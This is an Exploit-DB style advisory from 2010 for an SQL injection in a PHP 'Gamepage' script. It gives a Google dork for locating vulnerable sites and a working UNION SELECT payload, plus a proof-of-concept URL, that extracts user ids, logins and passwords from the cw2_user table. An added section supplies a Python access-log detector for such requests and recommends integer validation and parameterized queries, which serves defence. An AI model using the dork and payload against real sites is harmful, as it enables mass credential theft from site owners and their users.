PHP Gamepage - SQL Injection

EDB-ID: 12634
CVE: N/A
Author: v4lc0m87
Type: webapps
Platform: PHP
Date: 2010-05-17

*************************************************************************
 ,                               
 |       ,---. ,   . |---. ,---. ,---.   ,---. ,---. ,---. ,   .   ,
 |  ---  |     |   | |   | |---' |       |     |     |---' |   |   |
 |       `---' `---| `---' `---' `       `---' `     `---' `---`---
 `             `---'                                                   
*************************************************************************
[V] PHP Gamepage SQL Injection Vulnerability

			--==[ Author ]==--
[+] Author	: v4lc0m87
[+] Contact	: valcom87[at]gmail[dot]com
[+] Group	: INDONESIAN CYBER
[+] Site	: http://indonesian-cyber.org/
[+] Date	: May, 17-2010 [INDONESIA]

*************************************************************************
			--==[ Details ]==--

[+] Vulnerable	: SQL Injection
[+] Google Dork	: inurl:index.php?title=gamepage

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] -111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--

[-] Remote SQLi p0c:
[+] http://127.0.0.1/index.php?title=gamepage&m=-111+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,id,login,pass)v4lc0m87,0,0,0,0,0,0,0,0,0,0,0,0+from+cw2_user--
    

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
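
Added example, not part of the original advisory: a log check a defender can run to find requests like the p0c above, by flagging any title=gamepage request whose m parameter is not a plain integer or carries UNION/concat constructs. It assumes a combined-format access log and that a legitimate m is a non-negative integer; the sample log lines and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# SQL constructs of the kind the advisory's payload relies on.
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|\bconcat(?:_ws)?\s*\(", re.I | re.S)

# Constructed sample log lines (documentation IP ranges, shortened payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/May/2010:10:00:00 +0000] '
    '"GET /index.php?title=gamepage&m=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/May/2010:10:00:05 +0000] '
    '"GET /index.php?title=gamepage&m=-111+union+select+0,'
    'concat_ws(0x3a,id,login,pass)+from+cw2_user-- HTTP/1.1" 200 912',
    '203.0.113.5 - - [17/May/2010:10:00:09 +0000] '
    '"GET /index.php?title=gamepage&m=-1%20UNION%20SELECT%201 HTTP/1.1" 200 880',
    '192.0.2.10 - - [17/May/2010:10:00:12 +0000] '
    '"GET /index.php?title=news&m=abc HTTP/1.1" 200 100',
]

def inspect_request(target):
    """Return findings for one request target (path plus query string)."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "gamepage" not in query.get("title", []):
        return []
    findings = []
    for value in query.get("m", []):  # parse_qs has already URL-decoded it
        # Assumption: a legitimate `m` is a plain non-negative integer.
        if not re.fullmatch(r"\d+", value):
            findings.append("non-numeric m")
        if SQLI_RE.search(value):
            findings.append("sql keywords in m")
    return findings

def scan(lines):
    """Return (client_ip, findings) for every suspicious log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        findings = inspect_request(match.group("target")) if match else []
        if findings:
            hits.append((line.split(" ", 1)[0], findings))
    return hits

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, findings)
```

The same integer-only rule applied in the application before the query is built, together with a parameterized query, removes the injection point that this check only detects.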

INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | TECON-CREW.ORG

[V] thx to:
SaruKusai (always breaking up and getting back together, haha) MarilynMesum (hope you become the best bassist)
Team m0n0n, the camera hogs (clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601)
Naughty old kids (mbah l4mpor,awchoy)
flyff666 cruz3N petimati spykit v3n0m uzanc
kokoh wisdom (the program turned into 3 cartons of Marlboro menthol cigarettes, lol)
blue screen, skutengboy (you two make a well-matched couple, hahaha)
[K]urabu[S]aru [RnR] cO2 community
and y0u !!